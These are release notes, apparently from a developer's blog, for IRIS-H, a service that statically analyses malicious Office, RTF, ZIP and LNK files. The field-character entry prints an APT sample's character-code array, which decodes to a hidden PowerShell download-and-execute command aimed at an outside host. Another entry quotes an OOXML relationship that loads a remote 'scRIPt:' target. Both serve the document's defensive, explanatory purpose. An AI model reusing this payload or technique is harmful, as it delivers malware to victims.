IRIS-H: Alpha is dead! Long live Beta.

Quick Summary

Build Version: 0.2.0 (beta)
Change Type: new version release
Affected Components: API, UI
Short Description: New version includes:

• (new) complete re-write of the UI 'look & feel'
• (new) Yara rules support
• (new) personal service accounts
• (new) 'Workbench' data view (see Detailed Summary section for description)
• (new) 'External Intelligence' section added to the 'Report' data view
• (new) public GitHub repository for issues tracking and feedback
• API backend data handling infrastructure changes
• static analysis data extraction routines improvements
• bug fixes

Outstanding Tasks: Attach external intelligence feeds, minor cosmetic UI fixes, further data parsers improvements.
Known Issues: Minor cosmetic glitches in the UI.

Detailed Summary

Disclaimer: All the functionality descriptions and screenshot examples given below are relevant to the application state at the release time. Some features and interface 'look & feel' might change in the follow up releases.

Sections below describe some of the major features/changes implemented in this release.

New UI

IRIS-H UI has been completely re-written using Akveo Nebular UI and the mighty power of Angular. Where data views and service pages content is mostly the same, their look changed completely. Please see below for detailed breakdown.

Dashboard (Home page)

IRIS-H Dashboard View

The dashboard now performs 3 functions:

• overall submitted data view
• system health display
•  filters for currently loaded data

Where overall submitted data and systems health views are self-explanatory, the data filters functionality is explained below.

Each statistical data view panel is interactive. Clicking on a pie chart section or a bar will filter the 'Submissions' table view. For example, clicking 'Malicious OLE' bar in 'Object Linking & Embedding' panel will change the 'Submissions' table view to display only reports for malicious OLE files.

Filtering 'Submissions' table view using Dashboard submitted data panel

NOTE: The filters will apply only to the data already loaded into the dashboard - 50 latest submissions.

The data displayed in the dashboard depends on the user type - Public / Registered. There is a concept of 'Public' and 'Private' data now. The file analysis data is tied to the user account the file was submitted under.

Public data - file analysis reports generated under 'Public User' account (not logged in)

Private data - file analysis reports generated under logged in user.

Submission Page

Submission page didn't change that much in terms of the content and functionality.

IRIS-H Submission Page

The page now includes submission type indicator - Public/Private

IRIS-H submission type indicator - Public

IRIS-H submission type indicator - Private

Report Page

Content displayed on the report page has been re-worked and majority of the generic information has been removed.

IRIS-H Report page example

The report page now supports multiple reports display using separate report page tabs. Where the same functionality can be achieved with opening separate browsing session tabs in the Internet browser application, this feature serves as a good alternative.

IRIS-H Report page - tabs view example

NOTE: The memory consumed by the tool depends on the number of reports opened at the same time. Use Internet browser page refresh functionality to remove all report tabs except the currently active one.

Workbench Page

Workbench is a new data view type added in this release. It can be accessed through 'Report' page navigation sub-menu or through the main interface side bar if any workbench data is already loaded.

Access 'Workbench' view from 'Report' page

The 'Workbench' page allows for the submitted file content browsing using its structural view. The file content is displayed in HEX and ASCII formats.

IRIS-H Workbench Page example

The 'File Structure' tree view on the left hand side is interact-able as well as the HEX view of the data. When entry in the tree view is selected the corresponding HEX and ASCII pieces of data are scrolled into the view. HEX view is also interact-able the same way except for the scrolling part.

IRIS-H Workbench Page - file content browsing example

On each tree or HEX views interaction, content of the 'Description' panel on the right hand side is updated with corresponding data description as per official file format specification.

Download function is available for each individual file component as well as for the submitted file itself. The 'Download' button can be found on the right hand side in each workbench panel header.

NOTE: This feature is currently available for files in 'Shell Link Binary' format (LNK) only.

General UI features

Akveo Nebular UI offers many features to customize the interface look. All of the customization options are available through 'Settings' sub-menu located in the top right corner.

IRIS-H Interface customization settings

Where all of them are self-explanatory, I'd like to single out my favorite one - UI Theme customization. It allows for the interface theme on-the-fly change. There are currently 3 themes available - light, cosmic and corporate. Corporate theme is the default one, though my personal favorite is cosmic.

IRIS-H with Cosmic UI Theme applied

Yara Rules Support + 'External Intelligence'

New addition to the static analysis engine. IRIS-H will now scan the submitted files and their partial content with Yara rules. The scanning engine is based on node-yara module developed by NoSpaceships.

Current Yara rules set consist of the rules developed and collected by Florian Roth for his Nextron Systems scanners.

'Report' page now includes a new section called 'External Intelligence & Automated Scanning' that displays any Yara matches.

IRIS-H Report Page - Yara match example

This section will also display information collected from external sources. This feature is currently under development.

Personal Service User Account

IRIS-H now supports personal user accounts. Since this new feature is still in testing, the public registration process is currently unavailable, however user accounts can be provisioned upon a request(hit me up on Twitter).

Current personal account design provides the same features as the public account with the exception of making analysis report data private and available only to the user logged in with the account the submitted file was processed under.

There is no other difference in the features set.

GitHub Repository

Repository has been created on GitHub to enable issues tracking. Issue reports and feature suggestions are much appreciated.

Credits

This project wouldn't be where it is now without such a great support from the InfoSec community and all those highly talented people who create beautiful tools and applications that help and inspire a curious mind. There are no words to describe how much I value any collaboration that happens in those communities - you can never stop learning.

Special kudos go to:

• InfoSec community (honest to creators, you are machines. I envy your energy!)
• Angular community on stackoverflow.com (you're a mind-blowing folks)
• Individuals who supported the project with their valuable feedback and file samples. I simply can't post such a big list here and I do not support fame leeching, but you know who you are. I endlessly value our relationships.

IRIS-H (alpha): Added RTF files parser module

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: new feature
Affected Components: API, UI
Short Description: API side code logic(parser) has been added to allow for RTF files processing. Currently, the new parser provides basic data extraction capabilities. UI side 'Submission' and 'About' pages have been updated to reflect the new changes.
Outstanding Tasks: Second development iteration.
Known Issues: Some data obfuscation types are not supported.

Detailed Summary

New code logic has been added to IRIS-H to allow for Rich Text Format (RTF) files processing. The 'Submission' page will now accept RTF file upload and pass it for further processing which includes the following:

• extract document metadata
• identify and parse embedded objects
• extract font table
• detect languages used in the document
• provide description for all extracted data

Currently, the parsing module only provides essential processing. The module was tested with a good number of malicious RTF files and seems to be relatively stable handling the majority of obfuscation techniques. Thanks to @James_inthe_box for providing the samples!

Example Reports

https://iris-h.services/report/c3d93db2aa5aaf4f821548e15d79946e - CVE-2017-11882

https://iris-h.services/report/247f2739e20053ea397b748c35398c63 - OLE Autolink update using SoapMoniker

https://iris-h.services/report/fea6546e3299a31a58a3aa2a6b7060c9 - ASLR/DEP evasion using msvbvm60.dll (СVE-2017-11826 precursor)

IRIS-H (alpha): Added ZIP files support

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: new feature
Affected Components: API, UI
Short Description: API side code logic has been added to allow submitting ZIPed files. Industry standard password 'infected' is supported. UI side 'Submission' and 'About' pages have been updated to reflect the new changes.
Outstanding Tasks: None
Known Issues: ZIP files created with Ubuntu 'Archive Manager' throw an error.

Detailed Summary

The code logic has been added to IRIS-H to allow handling file extraction from ZIP archive files. The 'Submission' page will now accept ZIP file upload and perform the following operations with it:

• identify if the file is a Microsoft Office document in OOXML format
• identify the number of files in the archive
• identify if the password is set
• identify the unpacked size of the compressed file contained in the archive
• identify if the archive file is 'nested'

The following restrictions and limitations are applied:

• ZIP file must contain a single file
• if ZIP file password is enabled it must be set to 'infected'
• unpacked size of the compressed file contained in the archive must not exceed 10MB
• ZIP 'nesting' must not exceed 2 levels (ZIP-in-a-ZIP)
• ZIP file size must not exceed 4MB*

* 4MB ZIP file size limit is enforced by the underlying technology employed to handle the file extraction. More on this in the following section.

What's under the hood?

Disclaimer: The choice of the technology used to implement ZIP files support was mainly driven by a will to learn it. Another contributing factor though is the lack of good NodeJS libraries that provide password protected ZIP files handling.

IRIS-H API and UI components are written in different flavours of JavaScript. Originally, I was looking to implement ZIP files support using a JS library, but to my surprise I couldn't find the one with proper support for different compression and encryption types. I realized it would have to be implemented in a different programming language, but the integration with the rest of the service and its infrastructure seemed challenging until I decided to look into using AWS Lambda.

AWS Lambda supports a number of programming languages including C# with .NET Core 2.0. This opens up a good number of possible solutions. The choice stopped with SharpZipLib. This library supports most of the compression and encryption methods. Building an AWS Lambda function turned out to be a rather easy task. The most challenging part was dealing with the 'RequestResponse' size limitations enforced by 'Invoke' function. The only solution I could find was to apply the ZIP file size limit at the submission time. It's currently set to 4 MB due to the lambda's set limit of 6 MB. 2 MB difference goes toward 'base64' conversion the submitted ZIP file is a subject to when sent to the lambda function. 

Testing it with ZIP files of different sizes shows that it takes about 10 seconds on average to process a 4 MB ZIP file. Those under 1 MB are processed almost with no delay.

Like the rest of the service, this new feature is experimental and requires more thorough testing. I'd appreciate any feedback.

IRIS-H (alpha): Added LNK files "Console Data Block" structure parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: feature update
Affected Components: API
Short Description: Parser for LNK files "Console Data Block" structure has been added. The parser will attempt to extract all relevant data stored in "Console Data Block" structures. The information about Console Window is stored in these structures.
Outstanding Tasks: None

Detailed Summary

IRIS-H Shell Link (.LNK) file parser has been updated to include data extraction routine for "Console Data Block" structures. The ConsoleDataBlock structure specifies the display settings to use when a link target specifies an application that is run in a console window. Below are just some examples of data stored in these structures:

• foreground and background text colors in the console window.
• foreground and background text color in the console window popup.
• console window buffer size.
• console window size.
• console window origins coordinates.
• font information.
• cursor information.
• edit settings.

Below screenshot show an example of "Console Data Block" data extracted by IRIS-H.

IRIS-H report showing "Console Data Block" data

Full report can be found here - https://iris-h.services/report/dffa7c38201c92b1037d908addb0295e

IRIS-H (alpha): Updated LNK file parser / Command line arguments deobfuscation added

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: feature update
Affected Components: API & UI (clear browser cache for 'iris-h.service' to see the changes)
Short Description: Parser for LNK files has been updated. Command line arguments string deobfuscation and URL extraction code have been added. UI Report page has been updated to display the new data.
Outstanding Tasks: None

Detailed Summary

IRIS-H Shell Link (.LNK) file parser has been updated and now attempts to deobfuscate the command line arguments string. When the command line arguments string is present, the service will attempt the following:

• detect environment variables assignments with 'set' command
• detect environment variables usage with ' ! ' and ' % ' special characters
• replace referenced environment variables with their corresponding values
• remove escaping characters ' ^ ' and ' ` '
• detect and extract URL strings
• detect string concatenation operations and perform them

Below is a report example showing the new feature in action.

LNK file analysis results showing deobfuscated command line arguments string and extracted URL

Corresponding report - https://iris-h.services/report/7278cb3c9a5b14dcc54de59e21ec8c6c

More examples can be found here:

https://iris-h.services/report/166127261e36b959e48eece2c1b26185

https://iris-h.services/report/2de846108b26101e3554f5964c1a3576

NOTE
IRIS-H UI changes might require your Internet browser cache clean up for iris-h.services website to take effect.

IRIS-H (alpha): Updated OOXML 'document' file parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: feature update
Affected Components: API
Short Description: OOXML 'document' file parser has been updated to detect and extract "Drawing Object Non-Visual Properties".
Example: https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e
Outstanding Tasks: None

Detailed Summary

"Drawing Object Non-Visual Properties(docPr) element specifies non-visual object properties for the parent DrawingML object. These properties are specified as child elements of 'docPr' element." - ECMA-376 Part 1 (section 20.4.2.5)

OOXML 'document' file parser has been updated to extract non-visual object properties associated with inline drawing objects(pictures). The extracted data will be displayed in the corresponding 'document' panel under 'Individual Components' section on the report page. The following properties will be considered:

• descr - Specifies alternative text for the current DrawingML object, for use by assistive technologies or applications which do not display the current object.
• hidden - Specifies whether this DrawingML object is displayed. When a DrawingML object is displayed within a document, that object can be hidden (i.e., present, but not visible).
• name - Specifies the name of the object. Typically, this is used to store the original file name of a picture object.
• title - Specifies the title (caption) of the current DrawingML object.

Some of the above properties might be omitted from the property set. IRIS-H will only extract and display properties present in the set. See below for an example:

'document' panel showing non-visual object properties extracted from inline drawing object

As seen in the screenshot above, these properties might contain digital artifacts that can be helpful in a digital forensics investigation.

Full report for the example above can be found here - https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e

IRIS-H (alpha): Added OOXML 'Footer Part' parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: new feature
Affected Components: API
Short Description: Parser for OOXML "Footer Part" has been added. The parser detects and extracts text content including special field characters.
Example: https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e
Outstanding Tasks: None

Detailed Summary

"Footer Part contains the information about a footer displayed for one or more sections. Each Footer part is the target of an explicit relationship in the part-relationship item for the Main Document. Each footer has a corresponding 'ftr' element in a Footer part, which contains the text of the footer." - ECMA-376 Part 1 (section 11.3.6)

A new parser for OOXML 'Footer Part' has been added to IRIS-H. The parser will detect and extract text content including special field characters. The extracted content can be found in a new panel under 'Individual Components' section on the report page. See an example below:

Example of a Footer Part panel showing extracted text content.

If the extracted content includes special field characters, they will be analysed for presence of blacklisted field character command and if any detected, the findings will be populated in 'Malicious Findings' panel on the report page. Below is the corresponding findings panel:

Corresponding findings panel showing detected field character type

Full report for the example above can be found here - https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e

IRIS-H (alpha): Added OOXML Relationships file parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: new feature
Affected Components: API & UI (clear browser cache to see the changes)
Short Description: Parser for OOXML "Relationships" file has been added. The parser detects and extracts hyperlinks to external sources.
Outstanding Tasks: None

Detailed Summary

"Relationships are represented in XML in a Relationships part. Each part in the package that is the source of one or more relationships can have an associated Relationships part. This part holds the list of relationships for the source part." - ECMA-376 Part 2 (section 9.3.3)

Relationships file example

A new parser for OOXML Relationships file has been added to IRIS-H. The parser is configured to read every Relationship in the Relationships file and extract hyperlinks pointed at external sources. See below for an example of a Relationship that will be detected:

<Relationship Id="_id_1633" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" TargetMode="External" Target="scRIPt:https://filetea.me/n3wBS7q8XNvRjiEwg8ZL2bXhw/dl" />

The extracted hyperlinks will be displayed under "Suspicious Finding" panel. See below for an example:

"Suspicious Findings" example showing detected hyperlinks

Full report for the example above can be found here - https://iris-h.malwageddon.com/report/7b133ac4016aab06fff2c24e5d9e9e97

NOTE
IRIS-H UI changes might require your Internet browser cache clean up for iris-h.malwageddon.com website to take effect.

IRIS-H (alpha): Updated Field Characters Parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: feature improvement
Affected Components: API
Short Description: Parser for Field Characters used in OLE and OOXML documents has been updated to improve detection. QUOTE, SET, REF field characters have been added to the reporting.
Outstanding Tasks: None

Detailed Summary

Field Character extraction and parsing code has been improved to allow for decoding QUOTE command arguments. The change was motivated by McAfee's blog post today referencing OOXML document used in an APT type of attack. Document's XML code snippet below show an example of what field characters are used and how they are present in the code.

QUOTE field character usage example

DDE field character and the way its arguments are assembled

Unlike previous instances of DDE and DDEAUTO field character usage in malicious documents, this document doesn't expose the command arguments that normally contain indicators of compromise. Instead, a combination of other field characters is used to store and assemble the command arguments.

SET command is used to store the value produced by QUOTE command and later passed to DDE command through REF field character. Below is an example of that:

SET c QUOTE 67 58 92 80 114 111 103 114 97 109 115 92 77 105 99 114 111 115 111 102 116 92 79 102 102 105 99 101 92 77 83 87 111 114 100 46 101 120 101 92 46 46 92 46 46 92 46 46 92 46 46 92 87 105 110 100 111 119 115 92 83 121 115 116 101 109 51 50 92 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 92 118 49 46 48 92 112 111 119 101 114 115 104 101 108 108 46 101 120 101 32 45 78 111 80 32 45 115 116 97 32 45 78 111 110 73 32 45 87 32 72 105 100 100 101 110 32 36 101 61 40 78 101 119 45 79 98 106 101 99 116 32 83 121 115 116 101 109 46 78 101 116 46 87 101 98 67 108 105 101 110 116 41 46 68 111 119 110 108 111 97 100 83 116 114 105 110 103 40 39 104 116 116 112 58 47 47 110 101 116 109 101 100 105 97 114 101 115 111 117 114 99 101 115 46 99 111 109 47 99 111 110 102 105 103 46 116 120 116 39 41 59 112 111 119 101 114 115 104 101 108 108 32 45 101 110 99 32 36 101 32 35

 'c' variable now holds the output (character string built from the array of character codes) from QUOTE command. Later 'c' is referenced in DDE command call as one of the arguments.

DDE REF c

When DDE command is called, the value of 'c' variable will be used  as its argument.

IRIS-H field character handlers have been updated to be able to extract the character codes array associated with QUOTE command and decode it. If extraction and decoding is successful the report page will contain the output similar to the one below.

Example of QUOTE command evaluation

This method of using field characters presents new challenges, especially around reconstructing the original text in the same sequence as it appears in the document when it's opened with its corresponding host application. IRIS-H will still attempt to extract all the text fields, but the original text appearance sequence cannot be guarantied.

Full report can be found here - https://iris-h.malwageddon.com/report/e0b8c953e3e6c3f133d1d9301e8eb15a

IRIS-H (alpha): Added support for Shell Link (.LNK) files

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: new feature
Affected Components: API & UI
Short Description: Shell Link (.LNK) file format parser has been added to API component. Cosmetic changes to UI to align new data view with the existing format.
Outstanding Tasks: Implement support for missing Extra Data Blocks

Detailed Summary

New binary data parser has been added to IRIS-H service. It can handle processing and extracting digital artifacts from Shell Link (.LNK) files. The service now accepts LNK files through Submission page and can also automatically detect them embedded into submitted documents. In either case, the report page will display extracted binary data enriched with human readable description. The enrichment process references the official Microsoft specification for [MS-SHLLINK] Binary File Format.

The parser fully supports the following LNK file structures:

• ShellLinkHeader
• LinkTargetIDList
• LinkInfo
• StringData

ExtraData structure is partially supported at this time. Only the following Data Blocks will be processed:

• EnvironmentVariableDataBlock
• KnownFolderDataBlock
• SpecialFolderDataBlock
• TrackerDataBlock
• PropertyStoreDataBlock

Once all binary data is extracted, it'll be subject to a rule-based evaluation. The conclusion will be drawn if the submitted or embedded LNK file can be harmful. IRIS-H will attempt to reconstruct the command line including arguments if any. Below is an example of rule-based evaluation results.

LNK file rule-based evaluation results

A few new sections have been added to "Informational Findings" panel. The sections display information relevant to the LNK file target; file path, working directory, relevant path, command-line arguments, etc. One particular section - "Link Target Tracking" will contain the evaluation results of the data stored in the following Data Blocks:

• Droid Volume Identifier
• Droid File Identifier
• Birth Droid Volume Identifier
• Birth Droid File Identifier

Based on this data, IRIS-H will try to identify if the link target file was moved between the volumes on the original computer or if it was moved to another machine. For more information see page 10 of this PDF. Below is an example of "Informational Findings" view.

LNK file Informational Findings example

"Detailed Components Breakdown" section of the report contains all the data IRIS-H could extract from an LNK file. I was personally surprised to find out how much those little files actually contain. For example, TrackerDataBlock holds the Link Target originator machine's NetBIOS name and MAC address. See below for an example.

Data derived from TrackerDataBlock

ShellLinkHeader section contains time stamps associated with Link Target, as well as, its file attributes, the type of the media it resides on(hard disk, USB, network, etc), media serial number and even command line window state. See below for an example.

Data derived from ShellLinkHeader

In addition, IRIS-H will attempt to resolve "Known Folder" GUID and "Special Folder" ID and display their corresponding descriptions. See an example below.

Enriched data derived from KnownFolderDataBlock and SpecialFolderDataBlock

Examples of full reports can be found on the links below:

https://iris-h.malwageddon.com/report/50146115513f71531ea334071c69a771 - submitted LNK file.

https://iris-h.malwageddon.com/report/738e74f744e554d6ac89899357eca506 - embedded LNK file found in a Microsoft Office document.